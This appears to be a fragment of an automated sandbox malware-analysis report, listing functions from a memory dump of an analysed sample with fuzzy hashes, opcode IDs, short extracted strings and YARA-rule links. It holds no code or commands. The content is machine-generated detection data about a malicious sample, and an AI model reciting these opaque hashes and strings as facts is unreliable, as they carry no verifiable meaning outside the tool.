                                                                                                                                                  • Instruction Fuzzy Hash: 3D128C71A00219DFDB15EF69C854AAEBBF6BF88300F208569E505EB395DF349D81CB90
                                                                                                                                                  Function 01583E09 Relevance: 2.9, Strings: 2, Instructions: 434COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Xbq$$^q
                                                                                                                                                  • API String ID: 0-1593437937
                                                                                                                                                  • Opcode ID: 578311c4d32019b145f381999f1eb76cfecb0490c598d84a97733ddf6f26344c
                                                                                                                                                  • Instruction ID: 83c55e5c75dbbeca3ba54e5eaf6a2590a9dd7047ce456cb9c72c092b7b4c144b
                                                                                                                                                  • Opcode Fuzzy Hash: 578311c4d32019b145f381999f1eb76cfecb0490c598d84a97733ddf6f26344c
                                                                                                                                                  • Instruction Fuzzy Hash: 49F14C74A04209DFDB18EFB9D8545AEBBF2FF88310B148929E506EB354CE359C46CB51
                                                                                                                                                  Function 0158C147 Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: f90a8be960425d927990fcb609b7c3693a92ce67b25c54bd73f0e1610e1b30ce
                                                                                                                                                  • Instruction ID: 23401b77adcb2e7e95b8e572ba0d861fd3e796d64e170a5043e02276ac8bef99
                                                                                                                                                  • Opcode Fuzzy Hash: f90a8be960425d927990fcb609b7c3693a92ce67b25c54bd73f0e1610e1b30ce
                                                                                                                                                  • Instruction Fuzzy Hash: 86A1E675E00258CFDB14DFAAD884A9DBBF2BF89300F14806AE409BB365DB359945CF51
                                                                                                                                                  Function 01583B95 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Xbq$Xbq
                                                                                                                                                  • API String ID: 0-1243427068
                                                                                                                                                  • Opcode ID: 2b270f5cc68d3b998f2c7c751cf6a5823da9a92ab45590939b28c8ba695f6a0b
                                                                                                                                                  • Instruction ID: 32fcf8a0844b3568753c2342633c002e8363a0d58eccde2589d21030bad7a88b
                                                                                                                                                  • Opcode Fuzzy Hash: 2b270f5cc68d3b998f2c7c751cf6a5823da9a92ab45590939b28c8ba695f6a0b
                                                                                                                                                  • Instruction Fuzzy Hash: 84518F327853568BDBD49E75D89427A7BE6BB80220B544C7FC405EF340DAB8C8828751
                                                                                                                                                  Function 01585362 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: 7c719f9cd116a4ac0fe85317dcadeb045797ac32da8efc4050682f61ec15e468
                                                                                                                                                  • Instruction ID: 9075404874158888ee1cfac73e2209f25a480e8008f0ec65f598bd3c00f60370
                                                                                                                                                  • Opcode Fuzzy Hash: 7c719f9cd116a4ac0fe85317dcadeb045797ac32da8efc4050682f61ec15e468
                                                                                                                                                  • Instruction Fuzzy Hash: AD91D574E01258CFDB14DFA9D884A9DBBF2BF89300F1480AAE409BB365EB349845CF10
                                                                                                                                                  Function 0158CA08 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: 2dec69f8dd211ada56810a993603366d0ca3b0d0e564dfe4873b88b5681bdbf7
                                                                                                                                                  • Instruction ID: 2ffdea849a044bc1fd68e1f513081f49edec861a2b0c2db380e2cab73a5a947b
                                                                                                                                                  • Opcode Fuzzy Hash: 2dec69f8dd211ada56810a993603366d0ca3b0d0e564dfe4873b88b5681bdbf7
                                                                                                                                                  • Instruction Fuzzy Hash: A3819174E00218CFDB54DFAAD884A9DBBF2BF89310F148069E819BB365DB349985CF50
                                                                                                                                                  Function 0158D278 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: 5fc4baec80789e8508211201d49fcae7acd55596828681459ef3021893dd3d90
                                                                                                                                                  • Instruction ID: 4e0adb633b85cd8f1e4e874468b190934beeb780c4de5d1ecd54098892f71368
                                                                                                                                                  • Opcode Fuzzy Hash: 5fc4baec80789e8508211201d49fcae7acd55596828681459ef3021893dd3d90
                                                                                                                                                  • Instruction Fuzzy Hash: 7B81A274E01218CFDB54DFAAD984A9DBBF2BF89300F148069E819BB365DB749985CF10
                                                                                                                                                  Function 0158C468 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: e130331b349b504d96db0a0baaef950377cc9ad58458466c4384f498e126197e
                                                                                                                                                  • Instruction ID: ccd811f04c7d17f21f9d300985960927832dc514d97936a89ec4013a9c171684
                                                                                                                                                  • Opcode Fuzzy Hash: e130331b349b504d96db0a0baaef950377cc9ad58458466c4384f498e126197e
                                                                                                                                                  • Instruction Fuzzy Hash: C981B274E00218CFDB14DFAAD984A9DBBF2BF89304F14D069E419AB365DB349945CF60
                                                                                                                                                  Function 0158C738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: 5ae7da612b10df15f8ef292d4c9bb5129f8fe4775111cf6b005efada7e4adf79
                                                                                                                                                  • Instruction ID: 72d58d0ebcc632b765af750589d0e0a8caeb8f17b1325de796226631279632bc
                                                                                                                                                  • Opcode Fuzzy Hash: 5ae7da612b10df15f8ef292d4c9bb5129f8fe4775111cf6b005efada7e4adf79
                                                                                                                                                  • Instruction Fuzzy Hash: B681A074E00218DFDB14DFAAD984A9DBBF2BF89310F14C06AE819AB365DB349945CF50
                                                                                                                                                  Function 0158CCD8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: 8cee2553c994d43fc87c8f7b814bd65d38664aa7eeb5d9b72d27d11f20f68c0c
                                                                                                                                                  • Instruction ID: 481da4ee813ed16cd17836cb04ad39e61c4a941039ce3d9d0b5ebe38088c63ea
                                                                                                                                                  • Opcode Fuzzy Hash: 8cee2553c994d43fc87c8f7b814bd65d38664aa7eeb5d9b72d27d11f20f68c0c
                                                                                                                                                  • Instruction Fuzzy Hash: 9081A074E00218DFDB54DFAAD884A9DBBF2BF89300F148469E819AB365DB349985CF50
                                                                                                                                                  Function 0158CFAA Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PH^q$PH^q
                                                                                                                                                  • API String ID: 0-1598597984
                                                                                                                                                  • Opcode ID: bef77c0fe29cc2d296e7429babb396d75e2615ac56b42dca10e730b25bb8a50f
                                                                                                                                                  • Instruction ID: dc96645b6304d547d0fe71c5b9a7c5bec2387362e6e7a5432c3fd24fcc4362f6
                                                                                                                                                  • Opcode Fuzzy Hash: bef77c0fe29cc2d296e7429babb396d75e2615ac56b42dca10e730b25bb8a50f
                                                                                                                                                  • Instruction Fuzzy Hash: 3681A374E00218CFDB58DFAAD984A9DBBF2BF89310F148469E419BB365DB349985CF10
                                                                                                                                                  Function 0158E97A Relevance: .1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 651e01d1cfcb19473f23872d1deeb09f91b29d8594bc95bc9c5255f04b0569d3
                                                                                                                                                  • Instruction ID: 536f3fda9d8525c78a3acb99eaa203510a6ff4e626e6c8ae72a1735f63decd6c
                                                                                                                                                  • Opcode Fuzzy Hash: 651e01d1cfcb19473f23872d1deeb09f91b29d8594bc95bc9c5255f04b0569d3
                                                                                                                                                  • Instruction Fuzzy Hash: 7B51A674E00208DFDB18DFAAD984A9DBBB2FF88310F248429E815BB364DB759845CF14
                                                                                                                                                  Function 0158E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ee72436f5fdac90a1afd18d472dfe7dfdbf3790900765ea73847676da9f83ae1
                                                                                                                                                  • Instruction ID: b11d09e0be049ee8bc1d5e970b633e37d53451303830fba98ea3f0d1e8a67573
                                                                                                                                                  • Opcode Fuzzy Hash: ee72436f5fdac90a1afd18d472dfe7dfdbf3790900765ea73847676da9f83ae1
                                                                                                                                                  • Instruction Fuzzy Hash: 92519574E00208DFDB18DFAAD584A9DBBB2FF89300F248429E819BB364DB359945CF54
                                                                                                                                                  Function 015876F1 Relevance: 10.5, Strings: 8, Instructions: 472COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                  • API String ID: 0-1932283790
                                                                                                                                                  • Opcode ID: d9deae5a848f3c034df0a00e81bc656905b3b475c3358916f06b0853c9fe7377
                                                                                                                                                  • Instruction ID: b5e8afa20c0deabe132ffe5ab2d707caf4764c0f4ec7724ff71c1a8d29347a7a
                                                                                                                                                  • Opcode Fuzzy Hash: d9deae5a848f3c034df0a00e81bc656905b3b475c3358916f06b0853c9fe7377
                                                                                                                                                  • Instruction Fuzzy Hash: 45123A30A00209CFCB15EF69D984A9EBBF2FF88314F248599E559AB361DB31ED45CB50
                                                                                                                                                  Function 01585F38 Relevance: 2.8, Strings: 2, Instructions: 268COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hbq$Hbq
                                                                                                                                                  • API String ID: 0-4258043069
                                                                                                                                                  • Opcode ID: cda90be4517ee985bc741c90c4573dafa9a3a73b91ef70e35508be5943dcb7fc
                                                                                                                                                  • Instruction ID: 94300fe28ad0ebcb1e0960f79a50342d5b1e2587ffce85199015c13abb0d7641
                                                                                                                                                  • Opcode Fuzzy Hash: cda90be4517ee985bc741c90c4573dafa9a3a73b91ef70e35508be5943dcb7fc
                                                                                                                                                  • Instruction Fuzzy Hash: 6991AA71304255CFDB16AF28C854A6E7BE6BF88210F148869E9469F396DF38C942C791
                                                                                                                                                  Function 01586498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,bq$,bq
                                                                                                                                                  • API String ID: 0-2699258169
                                                                                                                                                  • Opcode ID: 367b2d8ce6d2de19fb73545286d3fedd6a1857024228c722bb5e58cdf7d56e94
                                                                                                                                                  • Instruction ID: c3f46d64b2e3ea7ac2b038fb7f028be986daf3518b14fc0611b430cfbae7bff4
                                                                                                                                                  • Opcode Fuzzy Hash: 367b2d8ce6d2de19fb73545286d3fedd6a1857024228c722bb5e58cdf7d56e94
                                                                                                                                                  • Instruction Fuzzy Hash: F081BE34A00506CFCB14EF6EC894A6EBBF2BF89214B148569D505FF3A5DB31E841CBA1
                                                                                                                                                  Function 0158AEBA Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (o^q$(o^q
                                                                                                                                                  • API String ID: 0-1946778100
                                                                                                                                                  • Opcode ID: e8c85bc443af1fef6cc4b843d62bf9d2b1e2c74d63e85d88801320a0c6e39751
                                                                                                                                                  • Instruction ID: e006b1cd29c33feb830e33d0179ff320b717e7ae22f4935fa175d29289a137f3
                                                                                                                                                  • Opcode Fuzzy Hash: e8c85bc443af1fef6cc4b843d62bf9d2b1e2c74d63e85d88801320a0c6e39751
                                                                                                                                                  • Instruction Fuzzy Hash: A0619071B002058FCB05AF69C884A6EBBF6BFC8710F148569E515EB3A5DA35DD41CB90
                                                                                                                                                  Function 01589C30 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                  • Opcode ID: eab3e6933a99ec5196c42128ac6bbf667ef43317cd9c35910cf59c135aa77133
                                                                                                                                                  • Instruction ID: 25c33562392c2344800f4a7b58f335b9190c43383fcdbda4238f6ad30d2f2744
                                                                                                                                                  • Opcode Fuzzy Hash: eab3e6933a99ec5196c42128ac6bbf667ef43317cd9c35910cf59c135aa77133
                                                                                                                                                  • Instruction Fuzzy Hash: BD518D317002059FDB01AE69C844B7EBBEAFBC8318F148465E909DF256EB75CC4187A1
                                                                                                                                                  Function 01588EF8 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $^q$$^q
                                                                                                                                                  • API String ID: 0-355816377
                                                                                                                                                  • Opcode ID: 4d8cc663528b696ffa671bc0c7c5097db67718e0c5e58a1454f2df09dbc373c5
                                                                                                                                                  • Instruction ID: 1afcf300b711c4944321df5e3450da0f9ae356b6707a41e033e7d3f6c68a141d
                                                                                                                                                  • Opcode Fuzzy Hash: 4d8cc663528b696ffa671bc0c7c5097db67718e0c5e58a1454f2df09dbc373c5
                                                                                                                                                  • Instruction Fuzzy Hash: 7231B7313042518FDB36AB2DC85463E7BA7FB84710B54586AF226EF292DE28DC81C755
                                                                                                                                                  Function 01580C8F Relevance: 1.8, Strings: 1, Instructions: 545COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LR^q
                                                                                                                                                  • API String ID: 0-2625958711
                                                                                                                                                  • Opcode ID: 23e953494e052862e6d417d23e6fe38e317000b2b9c00a4b5875bcf940d78379
                                                                                                                                                  • Instruction ID: cf3dbd1d5d2a39ef5b5deacddb6bca5776bfbe48a8c7703cb8fabd859094b2bc
                                                                                                                                                  • Opcode Fuzzy Hash: 23e953494e052862e6d417d23e6fe38e317000b2b9c00a4b5875bcf940d78379
                                                                                                                                                  • Instruction Fuzzy Hash: 3252EB74A01219DFCB65EF64E984A9DBBB2FB48301F1085B9D409A7365DF386E85CF80
                                                                                                                                                  Function 01580CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LR^q
                                                                                                                                                  • API String ID: 0-2625958711
                                                                                                                                                  • Opcode ID: 1ce1419a030de2a67eafe4ff07ee0b8e87105e5abadd5f64ce4177986f446d6d
                                                                                                                                                  • Instruction ID: d7940b3c6043cd7a134d4ee47f967ef67cde2062de65616f9d32138e8ac08064
                                                                                                                                                  • Opcode Fuzzy Hash: 1ce1419a030de2a67eafe4ff07ee0b8e87105e5abadd5f64ce4177986f446d6d
                                                                                                                                                  • Instruction Fuzzy Hash: 6752EB74A01219DFCB65EF64E984A9DBBB2FB48301F1085B9D409A7365DF386E85CF80
                                                                                                                                                  Function 0158E007 Relevance: .7, Instructions: 652COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 76e7bf174d5727c6036add89d5938698cfa579b4ad5e2c2aebb63bd8596e82fc
                                                                                                                                                  • Instruction ID: 2e44c0ee035be94fc1bcd2d8972293c5e70f4d89167ecd68b952bcd2f291e1c0
                                                                                                                                                  • Opcode Fuzzy Hash: 76e7bf174d5727c6036add89d5938698cfa579b4ad5e2c2aebb63bd8596e82fc
                                                                                                                                                  • Instruction Fuzzy Hash: E5129375035346CFE27A6B20EAAC12ABA61FB0F337315FC14F16B85149EF7115888B62
                                                                                                                                                  Function 0158E018 Relevance: .6, Instructions: 647COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e0fbd2f3e504d3635d9d59d6bb4d4b5d5ce0c96771972f2762f3b8e17b6f0ee6
                                                                                                                                                  • Instruction ID: 5f6f4a0a9faa790a86aef46aee00a9e8322f1faf839f16510a4c8a4a14e7641a
                                                                                                                                                  • Opcode Fuzzy Hash: e0fbd2f3e504d3635d9d59d6bb4d4b5d5ce0c96771972f2762f3b8e17b6f0ee6
                                                                                                                                                  • Instruction Fuzzy Hash: C6128375035346CFA27A6B30EAAC12ABA61FB0F337315FC14F16B85149AF7115888B62
                                                                                                                                                  Function 01589A10 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3e09e78c270b83bb75cfceb536f5d19e6429b8857c568ba2c2f576af88a2ca98
                                                                                                                                                  • Instruction ID: 56ec2da390c85770432a305ed70036f6817b52e9a7f92e474b1b2b21195aaff0
                                                                                                                                                  • Opcode Fuzzy Hash: 3e09e78c270b83bb75cfceb536f5d19e6429b8857c568ba2c2f576af88a2ca98
                                                                                                                                                  • Instruction Fuzzy Hash: A08101315006069FCB11DF6CC8809BAFBEAFFC5328B14C666E958AB355D731E851CBA0
                                                                                                                                                  Function 015880D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b3a492ce4f55ea9bece4c48553c94c1f0fa5e07f9fd40b0679cef987e6cc0099
                                                                                                                                                  • Instruction ID: 327b14fc1be834fe3e1d2cee4ab2c89bbb008e4c8744a058c620f87d50260e5e
                                                                                                                                                  • Opcode Fuzzy Hash: b3a492ce4f55ea9bece4c48553c94c1f0fa5e07f9fd40b0679cef987e6cc0099
                                                                                                                                                  • Instruction Fuzzy Hash: F9711534700A098FDB25EF6CC884A6E7BE6FF89310B5944A9E916EB361DB70DC41CB51
                                                                                                                                                  Function 0158F71F Relevance: .2, Instructions: 154COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e822eb8c23557505da63b241e66e86e1f2004feed92138bfc6b0156130355fa0
                                                                                                                                                  • Instruction ID: adca4ab9a2ece5a447b6632efae39d91583249d56854e494306dc1114c02d386
                                                                                                                                                  • Opcode Fuzzy Hash: e822eb8c23557505da63b241e66e86e1f2004feed92138bfc6b0156130355fa0
                                                                                                                                                  • Instruction Fuzzy Hash: 1D51F234D00219DFDB15DFA5D944A9DBBB2FF88300F60852AD809BB3A4DB796946CF40
                                                                                                                                                  Function 0158D548 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.4144394143.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1580000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d4abfef183a803ae52b0bae7546148777e0cc1eb43d5b3824b549ff035771f8f
                                                                                                                                                  • Instruction ID: 86a3e201c11cd0df653def93d74d2dce07338de398b07b98d3a2aa45bb696fbb
                                                                                                                                                  • Opcode Fuzzy Hash: d4abfef183a803ae52b0bae7546148777e0cc1eb43d5b3824b549ff035771f8f
                                                                                                                                                  • Instruction Fuzzy Hash: 5651A274E01218DFDB44DFAAD58499DBBF2FF89300F208069E819AB364DB30A805CF10
                                                                                                                                                  Function 015841A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
